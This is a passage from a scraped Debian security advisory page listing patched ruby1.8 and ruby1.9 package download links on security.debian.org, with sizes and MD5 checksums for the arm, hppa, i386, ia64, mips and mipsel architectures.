href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 792994 579ec1a30cd9a1cbd8bf67aa06dc4d24\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 697246 ca45d9a326d51f5434d1621abcece266\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 216240 423493a419191c35b8b3e80a1f1f1c9c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 216324 a266f8778f5e7d613db6ba3f15adb763\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 237202 5fc7e98291401cd3fe917ed05d9bd015\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 287576 eced197b837fe4d62c03b20bed6815be\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 1876264 bc351c3337a5d5987f6ddb836768922e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb</a>\r\nSize/MD5 checksum: 219386 3f0b1eb14311c982d63ebd0fab64f5f4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 215572 2c0ccc988ac6ea3250f8dc367ccaa2a2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb</a>\r\nSize/MD5 checksum: 311564 8dfe07d2f7dcf8275e8ad8f41dcda0c0\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 218160 513b9ae768f77d80a13fa851e1c8f4f7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 824152 6146a8f873531c0ed8cf0d06d2e17d2c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 395602 6cc76b78245992c6a68b9e078ae89d53\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 199900 d70a4e3bc2ced6217727543e7fe0f9b0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 316214 4e6641aa45421ffab8b99ab8a9e8d16a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 217620 85109a63b0b20068f6320cda8f3ec6ad\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 237090 a3d1415f5a1ad8238d56b050975189e9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 200304 783f82fe9eac7aa259a35479cc2a47e7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1880858 9ab71d7b85b97c1f2d2aa3500b9ce7c1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1040322 02afc219d2b174b059881ec0a83356fc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1861536 432efb1fffc5c2b1d9cc7b74ae7baa39\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 199202 84de055812481012c4876c17833ce3b0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1869258 834f2dbf84ab6697d7980d3658290cfd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 219214 801a3641d72145d568a6c0c88ef43bd8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 888950 464ded03bf97abbc0d417b089fa87d60\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 217980 2535726a60b609b1a55fc310328df532\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb</a>\r\nSize/MD5 checksum: 1677084 d5b606c636b8cd27143ce002d0ed2ce9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb</a>\r\nSize/MD5 checksum: 333772 38a4c8fef89fde902a0be85e59fe8a8f\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197974 e282a6d8268ef83c156a860fb8a16a7c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 216404 82cf3992d705f2e9b88a915e352ca934\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1530904 7f21db178c88933c5e077890402de73f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 1752738 3291630941e3dbb88efb8a97f33c208b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 217116 6d9fbeeb9354b35e033f036109c3187c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 216638 513608a225ce87330453e9b1bd910f34\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1001838 64e08e52fac509f2bcdec25fed6fdc07\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 719438 d568135366f021f1511e186201475268\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197348 8fec8e658d39d42c2857475ef279f08d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 290114 69d7bdf1893fe305a003fbcaf264c9e4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 1821730 a79338c8bfea54d6c6e78f85fb0aaa4d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 1867788 9258d6168a057238d5dd1ead02513e74\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 758004 40c77b36b3a2b061db9c16b4a01f4391\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 237546 2e1c1a544086d57780f3ae4bb02da9c0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 345762 cb32b33017f36b17cc06cc8ed90414b9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 309632 3202e1f7f3c9eb0b6062148b9af7e788\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb</a>\r\nSize/MD5 checksum: 215662 1cd102a588e1082716a0858dbc5891d0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb</a>\r\nSize/MD5 checksum: 197442 c38974894410e79acf7931fc0e8dad54\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 330612 0887a43e2d62199cc73660039d7f1919\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 351174 1bb59b9997961359cb20c9fb6945a0f0\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 351444 5918b0c479ee79cc7466484c76e6dd98\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 2225792 c780194abaeac68b844bc6fcd411376d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 971834 e280240763deda9e120b41faf64b47e2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 203432 7430326aeac7519e33b7ca34a77c1779\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220188 1b368e296ab170d1e005f600cada244f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1864142 76176efd4132f6dd862946935368e2d6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 218646 4c1088b7f7002d3223ca0a33e27eaa0e\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1095818 64f6c9fd95b4c6af5cdfade1b958e9c8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 236376 d8ffa9e36d27c315bf12543035067d4b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220668 62f25d6880a721afac92d5fbd08ee714\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 202476 a5d3f5c7b7c963ecd5ab916315deb460\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1024524 c406606563dae3bf9ad255a4c0c8344f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1895844 ea86b262fda8dc1dee04a1348abffbca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 201506 22ba7b847e836fd960b0cb53358c106b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb</a>\r\nSize/MD5 checksum: 220662 6f066d4dbe40ba488e1ae2e883dc6262\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb</a>\r\nSize/MD5 checksum: 1861880 e3b9fcda55d44a6b921140fc49cdbecc\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 215262 4d2fe03f92af44b8362661b562b21754\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1084552 2d2dac8ed50123fdb90d733e9cf9b855\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 1862110 3b49c520a4ce20c6d6fcc11319a182e1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 1680280 bf7a624e97e372c4bbfc2fe769ff8974\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 197456 8c980f163be8105285609fdd454e1977\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 236198 81b996367fc453a8ceb3a531501253de\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 301628 bb1dc6aa3461335e4a9b419cd267ee65\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 874228 a5cc44dbd1cc80f8eef1a159ab3189f3\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 216100 f2360af30afc204b9226bf5cc0863853\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 197594 fca3406a3b55cfdc69c8989b072ca031\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 802420 6699c1bd4709051c910fc0bfe68c9b37\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 215980 2d9003c25275e1fd5ee6c53d959344f7\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 281536 fe8d5b309e7ab0be35e721e6b3ac97dd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 217990 f096260bda09b34a2c2f8cf018c80ae1\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1850962 60c4d783bcb2d0f852aa38fac3cad1d5\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 196670 16d12b430464de86499d897c2a28b213\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb</a>\r\nSize/MD5 checksum: 1540332 5b40f3e2137e7753b54b3202a02f2fa9\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb</a>\r\nSize/MD5 checksum: 372286 2a9d8fc201caad40ceefb3cbd2a61d12\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 218178 0298e98b39cbf08fa18d4fe0d617df41\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb</a>\r\nSize/MD5 checksum: 215442 2c78e52c5e2a619a0d3b436c1a887a53\r\n<a 